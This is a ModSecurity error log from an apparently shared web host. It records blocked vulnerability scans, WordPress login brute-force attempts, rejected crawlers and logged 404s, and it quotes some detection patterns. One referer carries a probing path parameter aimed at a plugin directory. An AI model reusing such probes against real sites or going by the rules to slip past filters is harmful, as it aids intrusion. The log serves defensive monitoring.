[Tue May 26 19:20:42.019019 2026] [security2:error] [pid 37506:tid 37529] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlMgKctTPx5f8aOzkYygAARBY"]
[Tue May 26 19:20:43.305988 2026] [security2:error] [pid 37506:tid 37734] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlMgKctTPx5f8aOzkZBgAAAGI"]
[Tue May 26 19:20:43.488447 2026] [security2:error] [pid 37506:tid 37563] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlMwKctTPx5f8aOzkZHgAARDg"]
[Tue May 26 19:20:43.714684 2026] [security2:error] [pid 37506:tid 37573] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlMwKctTPx5f8aOzkZJwAAREI"]
[Tue May 26 19:20:43.991937 2026] [security2:error] [pid 37506:tid 37725] [client 69.58.76.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlMwKctTPx5f8aOzkZKwAAAFk"], referer: https://www.anujtradingco.com/
[Tue May 26 19:20:44.392908 2026] [security2:error] [pid 37506:tid 37568] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlNAKctTPx5f8aOzkZQQAARD0"]
[Tue May 26 19:20:44.505362 2026] [security2:error] [pid 37506:tid 37576] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlNAKctTPx5f8aOzkZRgAAREU"]
[Tue May 26 19:20:45.564145 2026] [security2:error] [pid 37506:tid 37752] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlNQKctTPx5f8aOzkZWAAAAHQ"]
[Tue May 26 19:20:45.583313 2026] [security2:error] [pid 37506:tid 37686] [client 69.58.76.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlNQKctTPx5f8aOzkZYgAAADI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1219367&moderation-hash=e1ace62890108a8964350a02de014665
[Tue May 26 19:20:47.629794 2026] [security2:error] [pid 37506:tid 37581] [remote 47.128.42.156:28872] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "christinaspromotions.com"] [uri "/services/promotional-staffing-marketing/"] [unique_id "ahWlNwKctTPx5f8aOzkZjAAACUo"]
[Tue May 26 19:20:48.176638 2026] [security2:error] [pid 37506:tid 37695] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlNwKctTPx5f8aOzkZjwAAADs"]
[Tue May 26 19:20:48.570186 2026] [security2:error] [pid 37506:tid 37586] [remote 18.209.220.99:3097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlOAKctTPx5f8aOzkZogAAJE8"]
[Tue May 26 19:20:48.828396 2026] [security2:error] [pid 37506:tid 37584] [remote 18.209.220.99:3097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlOAKctTPx5f8aOzkZrAAAEk0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:20:49.565677 2026] [security2:error] [pid 37506:tid 37683] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlOQKctTPx5f8aOzkZuAAAAC8"]
[Tue May 26 19:20:49.620712 2026] [security2:error] [pid 37506:tid 37595] [remote 216.73.216.30:50238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlOQKctTPx5f8aOzkZwwAAOlg"]
[Tue May 26 19:20:51.173484 2026] [security2:error] [pid 37506:tid 37646] [client 51.195.215.96:59242] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "amslca.com"] [uri "/robots.txt"] [unique_id "ahWlOwKctTPx5f8aOzkZ6gAAAAo"]
[Tue May 26 19:20:51.173655 2026] [security2:error] [pid 37506:tid 37646] [client 51.195.215.96:59242] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "amslca.com"] [uri "/robots.txt"] [unique_id "ahWlOwKctTPx5f8aOzkZ6gAAAAo"]
[Tue May 26 19:20:52.033657 2026] [security2:error] [pid 37506:tid 37727] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlOwKctTPx5f8aOzkZ_wAAAFs"]
[Tue May 26 19:20:52.078375 2026] [security2:error] [pid 37506:tid 37597] [remote 2a0a:5684:20b9:687f:6245:cbff:fe7a:8474:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWlPAKctTPx5f8aOzkaDAAAblo"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:20:52.498044 2026] [security2:error] [pid 37506:tid 37746] [client 2a0a:5684:20b9:687f:6245:cbff:fe7a:8474:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahWlPAKctTPx5f8aOzkaDAAAblo"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 19:20:52.542618 2026] [security2:error] [pid 37506:tid 37757] [client 148.113.128.161:30954] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "amslca.com"] [uri "/"] [unique_id "ahWlPAKctTPx5f8aOzkaHAAAAHk"]
[Tue May 26 19:20:52.542744 2026] [security2:error] [pid 37506:tid 37757] [client 148.113.128.161:30954] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "amslca.com"] [uri "/"] [unique_id "ahWlPAKctTPx5f8aOzkaHAAAAHk"]
[Tue May 26 19:20:55.123951 2026] [security2:error] [pid 37506:tid 37669] [client 68.187.57.218:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlPgKctTPx5f8aOzkaYgAAACE"]
[Tue May 26 19:20:55.338776 2026] [security2:error] [pid 37506:tid 37684] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlPgKctTPx5f8aOzkaZgAAADA"]
[Tue May 26 19:20:55.367038 2026] [security2:error] [pid 37506:tid 37612] [remote 162.214.206.32:56476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlPwKctTPx5f8aOzkabQAAJGk"]
[Tue May 26 19:20:55.535958 2026] [security2:error] [pid 37506:tid 37614] [remote 162.214.206.32:56476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlPwKctTPx5f8aOzkaewAAKGs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:20:56.993556 2026] [security2:error] [pid 37506:tid 37698] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlQAKctTPx5f8aOzkamgAAAD4"]
[Tue May 26 19:20:59.297673 2026] [security2:error] [pid 37506:tid 37714] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlQgKctTPx5f8aOzkaxwAAAE4"]
[Tue May 26 19:20:59.739223 2026] [security2:error] [pid 37506:tid 37619] [remote 161.97.109.81:58932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWlQwKctTPx5f8aOzka0gAAAXA"]
[Tue May 26 19:21:00.852694 2026] [security2:error] [pid 37506:tid 37753] [client 92.222.104.207:37532] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahWlRAKctTPx5f8aOzka7QAAAHU"]
[Tue May 26 19:21:00.852811 2026] [security2:error] [pid 37506:tid 37753] [client 92.222.104.207:37532] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "wrapmachines.com"] [uri "/robots.txt"] [unique_id "ahWlRAKctTPx5f8aOzka7QAAAHU"]
[Tue May 26 19:21:01.884445 2026] [security2:error] [pid 37506:tid 37669] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlRQKctTPx5f8aOzkbCgAAACE"]
[Tue May 26 19:21:02.204933 2026] [security2:error] [pid 37506:tid 37703] [client 54.39.89.94:63500] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "wrapmachines.com"] [uri "/"] [unique_id "ahWlRgKctTPx5f8aOzkbHwAAAEM"]
[Tue May 26 19:21:02.205023 2026] [security2:error] [pid 37506:tid 37703] [client 54.39.89.94:63500] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "wrapmachines.com"] [uri "/"] [unique_id "ahWlRgKctTPx5f8aOzkbHwAAAEM"]
[Tue May 26 19:21:02.384502 2026] [security2:error] [pid 37506:tid 37634] [remote 161.97.109.81:58932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 81.109.97.161.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWlRgKctTPx5f8aOzkbIAAAA38"], referer: https://preetishah.com/wp-login.php
[Tue May 26 19:21:03.949442 2026] [security2:error] [pid 37506:tid 37713] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlRwKctTPx5f8aOzkbPgAAAE0"]
[Tue May 26 19:21:03.964599 2026] [security2:error] [pid 37506:tid 37519] [remote 143.198.203.76:49382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlRwKctTPx5f8aOzkbTAAAUAw"]
[Tue May 26 19:21:06.261896 2026] [fcgid:warn] [pid 37506:tid 37681] (70014)End of file found: [client 199.45.154.151:38620] mod_fcgid: can't get data from http client
[Tue May 26 19:21:07.090797 2026] [security2:error] [pid 37506:tid 37737] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlSgKctTPx5f8aOzkbnwAAAGU"]
[Tue May 26 19:21:07.896983 2026] [security2:error] [pid 37506:tid 37727] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlSwKctTPx5f8aOzkbsAAAAFs"]
[Tue May 26 19:21:09.262422 2026] [security2:error] [pid 37506:tid 37528] [remote 78.142.18.172:40630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlTQKctTPx5f8aOzkb0QAAJhU"]
[Tue May 26 19:21:10.533369 2026] [security2:error] [pid 37506:tid 37537] [remote 79.143.178.15:56966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.178.143.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWlTgKctTPx5f8aOzkb-wAATh4"]
[Tue May 26 19:21:10.549749 2026] [security2:error] [pid 37506:tid 37727] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlTgKctTPx5f8aOzkb9gAAAFs"]
[Tue May 26 19:21:11.334291 2026] [security2:error] [pid 37506:tid 37547] [remote 18.190.7.192:55500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlTwKctTPx5f8aOzkcDwAATyg"]
[Tue May 26 19:21:11.600381 2026] [security2:error] [pid 37506:tid 37549] [remote 18.190.7.192:55500] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlTwKctTPx5f8aOzkcHwAAeCo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:21:12.144487 2026] [security2:error] [pid 37506:tid 37691] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlTwKctTPx5f8aOzkcIgAAADc"]
[Tue May 26 19:21:12.192389 2026] [security2:error] [pid 37506:tid 37701] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWlUAKctTPx5f8aOzkcKwAAAEE"]
[Tue May 26 19:21:12.192833 2026] [security2:error] [pid 37506:tid 37738] [client 66.249.64.109:57968] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWlUAKctTPx5f8aOzkcJgAAAGY"]
[Tue May 26 19:21:12.403669 2026] [security2:error] [pid 37506:tid 37555] [remote 78.142.18.172:40630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlUAKctTPx5f8aOzkcNQAATDA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:21:14.192134 2026] [security2:error] [pid 37506:tid 37546] [remote 103.216.118.192:53690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWlUQKctTPx5f8aOzkcVQAADyc"]
[Tue May 26 19:21:14.679818 2026] [security2:error] [pid 37506:tid 37562] [remote 103.216.118.192:53690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.118.216.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWlUgKctTPx5f8aOzkcbwAAYTc"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 19:21:15.292796 2026] [security2:error] [pid 37506:tid 37719] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlUgKctTPx5f8aOzkcdQAAAFM"]
[Tue May 26 19:21:17.491797 2026] [security2:error] [pid 37506:tid 37707] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlVQKctTPx5f8aOzkcrgAAAEc"]
[Tue May 26 19:21:18.712226 2026] [security2:error] [pid 37506:tid 37567] [remote 208.109.188.137:58450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlVgKctTPx5f8aOzkc1wAACDw"]
[Tue May 26 19:21:19.579343 2026] [security2:error] [pid 37506:tid 37731] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlVwKctTPx5f8aOzkc4gAAAF8"]
[Tue May 26 19:21:19.895438 2026] [security2:error] [pid 37506:tid 37680] [client 189.150.150.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlVwKctTPx5f8aOzkc9QAAACw"]
[Tue May 26 19:21:20.927340 2026] [security2:error] [pid 37506:tid 37619] [remote 74.7.241.58:33872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWlWAKctTPx5f8aOzkdRQAAO3A"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-content/plugins/wp-staging/Framework/DI
[Tue May 26 19:21:21.500046 2026] [security2:error] [pid 37506:tid 37645] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlWQKctTPx5f8aOzkdXgAAAAk"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 19:21:21.639310 2026] [security2:error] [pid 37506:tid 37676] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlWQKctTPx5f8aOzkdVQAAACg"]
[Tue May 26 19:21:22.323573 2026] [autoindex:error] [pid 37506:tid 37735] [client 66.132.195.110:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/subbroker.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:21:22.467387 2026] [security2:error] [pid 37506:tid 37744] [client 128.140.41.193:38346] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWlWQKctTPx5f8aOzkdawAAAGw"], referer: http://ucdc.co.in/
[Tue May 26 19:21:22.746562 2026] [security2:error] [pid 37506:tid 37520] [remote 208.109.188.137:58450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlWgKctTPx5f8aOzkdigAADQ0"], referer: https://freshmindsolutions.com/wp-login.php
